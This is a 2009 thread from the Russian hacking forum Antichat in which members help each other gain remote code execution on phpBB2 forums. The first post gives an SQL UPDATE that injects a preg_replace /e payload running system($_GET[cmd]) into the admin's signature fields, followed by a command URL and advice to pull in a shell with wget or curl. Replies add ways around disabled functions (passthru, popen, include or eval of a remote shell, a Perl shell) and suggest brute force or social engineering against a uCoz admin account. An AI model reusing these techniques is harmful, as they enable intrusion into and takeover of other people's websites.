ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.05.2009, 16:48
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
импортируешь код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2;
потом site.com/phpBB2/profile.php?mode=editprofile&cmd=ls -lia
ну как то так)
и льешь шелл. Через wget, curl или fetch..
|
|
|
02.05.2009, 17:58
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
laedafess
Не канает
Подредактировал скрипт чуть (так как ты не правильно написал чуток)
При заходе на страницу (без GET запроса)
Пишет:
Warning: shell_exec() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1
Warning: system() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1
А если переходить вместе с GETом то идет редирект на главную страницу форума
|
|
|
|
02.05.2009, 18:05
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Ну значит отключены ф-кции.
|
|
|
|
02.05.2009, 18:08
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
mailbrush ну так это то ясно что отключенны функции
я имею ввиду есть еще какие нибуть методы?
|
|
|
|
02.05.2009, 18:33
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
У меня похожая ситуация, при подстановке system($_GET[cmd]) ничего не выходит, хотя функции включены...
|
|
|
|
02.05.2009, 18:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
в общем там сейф мод=он
попробуй другие функции, например passthru.(хотя скорее всего тоже не пройдет)
ищи способы обхода сейф мода(в гугл с запросом safe_mode bypass )
хотя, имхо, тебе еще рано.
|
|
|
|
02.05.2009, 22:02
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 11
Провел на форуме:
35538
Репутация:
10
|
|
Я знаю акк админа на одном сайте созданым на юкоз,можно ли с помощью его както взломать панель управления?
|
|
|
|
02.05.2009, 23:51
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Можно. СИ / Брут.
|
|
|
|
03.05.2009, 00:18
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
geezer.code, нет, там как бэ не сейф мод, если бы был сейф мод - пшп ругался бы на то что включен сейф мод, а пшп ругается что отключены функции
Warning: shell_exec() has been disabled for security reasons
Вообще тут надо пробовать другие системные функции, типа popen или passthru
а вообще лучше залить гифку с полноценным шеллом, вместо
'phpbb:system($_GET[cmd])'
вставить
='phpbb:include($_GET[cmd])'
и его проинклудить. А там уже можно посмотреть какие функции отключены и если отключены все функции позволяющие выполнять команды, пробовать залить перловый шелл с штацессом
вот, удачке в хэке =)
|
|
|
|
03.05.2009, 00:49
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Лучше eval, т.к. удалённый инклуд тоже может быть запрещён.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
